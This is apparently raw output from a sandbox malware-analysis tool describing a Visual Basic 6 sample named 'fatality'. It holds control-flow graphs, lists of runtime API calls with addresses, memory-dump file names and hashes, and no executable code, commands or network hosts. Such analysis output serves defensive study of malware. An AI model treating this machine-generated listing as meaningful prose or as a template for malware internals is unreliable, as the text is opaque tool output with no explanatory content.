                                                                                                                                                            control_flow_graph 0 408c50-408d9c call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 10 408da2-409172 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 0->10 11 4091be-4091da __vbaStrCmp 0->11 52 409177-4091b9 __vbaFreeStrList 10->52 13 4091e0-409209 call 4125a0 11->13 14 40948c-4094a8 __vbaStrCmp 11->14 26 40924b-409296 __vbaStrCat #600 __vbaFreeVar 13->26 27 40920b-409245 call 40fba0 call 415660 #580 13->27 16 409b34-409b6f __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 14->16 17 4094ae-4094c7 call 4125a0 14->17 40 409b74-409c67 __vbaStrMove * 3 #690 __vbaFreeStrList #537 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 411590 16->40 31 409509-409582 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 17->31 32 4094c9-409503 call 40fba0 call 415660 #580 17->32 28 409298-4092a4 call 404c14 __vbaSetSystemError 26->28 29 4092aa-40933d __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaObjSet 26->29 27->26 28->29 68 409362 29->68 69 40933f-409360 __vbaHresultCheckObj 29->69 49 409584-4095a5 __vbaHresultCheckObj 31->49 50 4095a7 31->50 32->31 48 409c6c-409c97 __vbaFreeStrList 40->48 54 409c99-409ca6 __vbaEnd 48->54 55 409cab-409cc4 call 4125a0 48->55 56 4095b1-409646 __vbaFreeObj __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 49->56 50->56 59 409dec-409ee3 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy call 40ee70 __vbaStrMove * 3 #690 __vbaFreeStrList #600 __vbaEnd 54->59 55->59 66 409cca-409ce4 #535 55->66 87 4097e2-409858 __vbaStrCopy call 410fb0 __vbaStrMove call 40ee70 __vbaStrMove __vbaInStr __vbaFreeStrList 56->87 88 40964c-4097dd __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove #611 #661 #705 __vbaStrMove * 3 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVarList 56->88 80 409ee9-40a26c __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 418c90 __vbaFreeStrList call 418a10 * 2 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 59->80 72 40aba7 66->72 73 409cea-409db1 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410180 __vbaFreeStrList call 40fba0 #598 call 415660 66->73 70 40936c-4093ff __vbaFreeObj __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove call 410780 __vbaFreeStrList 68->70 69->70 83 409405-409481 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeVar 70->83 84 409487 70->84 72->72 103 409db3 73->103 104 409db5-409dd0 #535 __vbaFpR4 73->104 143 40a272-40a2b9 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 80->143 144 40aa5b-40aa71 call 40f1d0 80->144 83->84 84->80 106 409aad-409af7 __vbaObjSet 87->106 107 40985e-40986c 87->107 88->106 109 409dd6-409de6 #580 103->109 104->73 104->109 121 409af9-409b1a __vbaHresultCheckObj 106->121 122 409b1c 106->122 110 40988a 107->110 111 40986e-409888 __vbaNew2 107->111 109->59 114 409894-4098c7 110->114 111->114 123 4098c9-4098ea __vbaHresultCheckObj 114->123 124 4098ec 114->124 126 409b26-409b2f __vbaFreeObj 121->126 122->126 127 4098f6-409924 123->127 124->127 126->80 132 409926-409947 __vbaHresultCheckObj 127->132 133 409949 127->133 134 409953-409aaa #611 #661 #705 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove * 2 __vbaStrCat __vbaStrMove __vbaStrCat #600 __vbaFreeStrList __vbaFreeObj __vbaFreeVarList 132->134 133->134 134->106 149 40a329-40a370 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 143->149 150 40a2bb-40a323 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 143->150 151 40aa73-40aa7a call 40f1a0 144->151 152 40aa7f-40aac9 __vbaObjSet 144->152 157 40a3e0-40a427 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 149->157 158 40a372-40a3da __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 149->158 150->149 151->152 161 40aacb-40aaec __vbaHresultCheckObj 152->161 162 40aaee 152->162 165 40a497-40a4de __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 157->165 166 40a429-40a491 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 157->166 158->157 164 40aaf8-40ab84 __vbaFreeObj __vbaFreeStr * 2 161->164 162->164 170 40a4e0-40a548 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 165->170 171 40a54e-40a595 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 165->171 166->165 170->171 174 40a605-40a64c __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 171->174 175 40a597-40a5ff __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 171->175 178 40a6bc-40a703 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 174->178 179 40a64e-40a6b6 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 174->179 175->174 182 40a773-40a7ba __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 178->182 183 40a705-40a76d __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 178->183 179->178 186 40a82a-40a871 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 182->186 187 40a7bc-40a824 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 182->187 183->182 190 40a8e1-40a928 __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 186->190 191 40a873-40a8db __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 186->191 187->186 194 40a998-40a9df __vbaStrCat __vbaStrMove call 40f8f0 __vbaFreeStr 190->194 195 40a92a-40a992 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 190->195 191->190 198 40a9e1-40aa49 __vbaStrCat __vbaStrMove #580 __vbaFreeStr __vbaStrCat #529 __vbaFreeVar 194->198 199 40aa4f-40aa56 194->199 195->194 198->199
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408C5A
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C67
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408C77
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408C8F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F00F
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 0040F018
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F049
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F054
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F05B
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0AF
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0B8
                                                                                                                                                              • Part of subcall function 0040EE70: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F0F3
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F104
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 0040F107
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F112
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0040F117
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408CA3
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408CB0
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408CC0
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408CD8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrCopy.MSVBVM60 ref: 0040F13C
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(0040F175), ref: 0040F16E
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408CEC
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408CF9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D09
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408D21
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 00408D35
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 00408D42
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00408D52
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408DB5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408DFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408E5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408ECE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408EE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F2F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F5F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00408F77
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00408FE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409000
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,0040614C), ref: 00409057
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409070
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090A0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 004090E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409101
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409130
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 00409149
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                              • Part of subcall function 00410180: CloseHandle.KERNELBASE(?), ref: 004104ED
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                              • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                              • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                              • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                              • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                              • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                              • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                              • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 004091D2
                                                                                                                                                            • #580.MSVBVM60(00000000,00000027,00000000,00000000,0041B088,00000000), ref: 00409245
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,00000000,00000000), ref: 0040925D
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040930E
                                                                                                                                                            • __vbaHresultCheckObj.MSVBVM60(00000000,?,00405A00,0000005C), ref: 00409354
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000000.00000002.1707601701.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000000.00000002.1707527529.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707561650.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707711047.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            • Associated: 00000000.00000002.1707870858.000000000041D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_fatality.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$Copy$List$Error$System$Ansi$#516#631$Bstr$#525#537#580#600#616BoundsCheckChkstkCloseConstruct2DestructGenerateHandleHresultUnicode
                                                                                                                                                            • String ID: PR$ RO$ SE$Once$~
                                                                                                                                                            • API String ID: 4272439835-1255219571
                                                                                                                                                            • Opcode ID: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
                                                                                                                                                            • Instruction ID: 7d3b41f73b1118d4cefcb71df8c3f05656ff7fe774afdbe4e31ac6fe335ab197
                                                                                                                                                            • Opcode Fuzzy Hash: d5fff701b2953cd860e5e11b1a5544c82864759be8fb13f2454ba8dac6c0f824
                                                                                                                                                            • Instruction Fuzzy Hash: A213EC75910208EFDB14EFE0EE58ADE7B79FF48301F108169F606A72A0DB745A49CB58
                                                                                                                                                            Function 00407A50 Relevance: 316.2, APIs: 178, Strings: 2, Instructions: 1164COMMON
                                                                                                                                                            Download Yara Rule

                                                                                                                                                            Control-flow Graph

                                                                                                                                                            • Executed
                                                                                                                                                            • Not Executed
                                                                                                                                                            control_flow_graph 200 407a50-407aba __vbaChkstk 202 407ad8 200->202 203 407abc-407ad6 __vbaNew2 200->203 204 407ae2-407b15 202->204 203->204 206 407b17-407b38 __vbaHresultCheckObj 204->206 207 407b3a 204->207 208 407b44-407b75 206->208 207->208 210 407b77-407b98 __vbaHresultCheckObj 208->210 211 407b9a 208->211 212 407ba4-407bc4 __vbaFreeObj 210->212 211->212 213 407bd3-407be1 212->213 214 407bc6-407bcd __vbaEnd 212->214 215 407be3-407bfd __vbaNew2 213->215 216 407bff 213->216 214->213 217 407c09-407c3c 215->217 216->217 219 407c61 217->219 220 407c3e-407c5f __vbaHresultCheckObj 217->220 221 407c6b-407c97 219->221 220->221 223 407c99-407cba __vbaHresultCheckObj 221->223 224 407cbc 221->224 225 407cc6-407cf6 __vbaFreeObj 223->225 224->225 227 407cf8-407d19 __vbaHresultCheckObj 225->227 228 407d1b 225->228 229 407d25-407d33 227->229 228->229 230 407d51 229->230 231 407d35-407d4f __vbaNew2 229->231 232 407d5b-407d8e 230->232 231->232 234 407d90-407db1 __vbaHresultCheckObj 232->234 235 407db3 232->235 236 407dbd-407deb 234->236 235->236 238 407e10 236->238 239 407ded-407e0e __vbaHresultCheckObj 236->239 240 407e1a-407e70 #618 __vbaStrMove __vbaStrCmp __vbaFreeStrList __vbaFreeObj 238->240 239->240 241 407e76-407e84 240->241 242 407f98-407fa6 240->242 243 407ea2 241->243 244 407e86-407ea0 __vbaNew2 241->244 245 407fc4 242->245 246 407fa8-407fc2 __vbaNew2 242->246 248 407eac-407edf 243->248 244->248 247 407fce-408001 245->247 246->247 251 408003-408024 __vbaHresultCheckObj 247->251 252 408026 247->252 253 407ee1-407f02 __vbaHresultCheckObj 248->253 254 407f04 248->254 255 408030-40805e 251->255 252->255 256 407f0e-407f3c 253->256 254->256 259 408060-408081 __vbaHresultCheckObj 255->259 260 408083 255->260 261 407f61 256->261 262 407f3e-407f5f __vbaHresultCheckObj 256->262 263 40808d-4080b3 __vbaStrCat __vbaStrMove __vbaFreeStr __vbaFreeObj 259->263 260->263 264 407f6b-407f93 __vbaStrMove __vbaFreeObj 261->264 262->264 265 4080b9-408110 __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList 263->265 264->265 268 408112-40812c __vbaNew2 265->268 269 40812e 265->269 270 408138-40816b 268->270 269->270 272 408190 270->272 273 40816d-40818e __vbaHresultCheckObj 270->273 274 40819a-4081c8 272->274 273->274 276 4081ca-4081eb __vbaHresultCheckObj 274->276 277 4081ed 274->277 278 4081f7-4087e2 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove #517 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaFreeObj __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCat __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy call 40ee70 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 